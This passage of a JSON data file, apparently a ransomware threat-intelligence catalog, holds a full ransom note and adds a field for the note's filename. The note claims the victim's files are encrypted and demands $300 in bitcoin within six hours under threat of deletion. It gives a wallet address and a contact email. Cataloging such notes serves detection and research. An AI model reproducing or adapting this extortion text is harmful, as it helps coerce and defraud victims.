 "Attention MOTHERFUCKER!\n\nAll your main files were encrypted!\n\nYour personal files (documents, databases, jpeg, docx, doc,\netc.) were encrypted, their further using impossible.\nTO DECRYPT YOUR FILES YOU NEED TO BUY A SOFTWARE WITH YOUR UNIQUE PRIVATE KEY. ONLY OUR\nSOFTWARE WILL ALLOW YOU DECRYPT YOUR FILES.\nNOTE:\nYou have only 6 hours from the moment when an encryption was done to buy our software at $300, in bitcoin\nYou all files will get deleted after the lapse of 6 hours.\nAny attempts to remove this encryption will be unsuccessful. You cannot do this without our software with your key.\nDo not send any emails with threats and rudeness to us. Example of email format: Hi, I need a decryption of my files.\n\nBitcoin address = 1GstvLM6SumX3TMMgN9PvXQsEy3FR9ZqWX\n\nContact us by email only: ayaan321308@gmail.com"
 ],
+ "ransomnotes-filenames": [
+ "how to get back you files.txt"
+ ],
 "ransomnotes-refs": [
 "https://pbs.twimg.com/media/DrkmCriWwAMCdqF.jpg"
 ],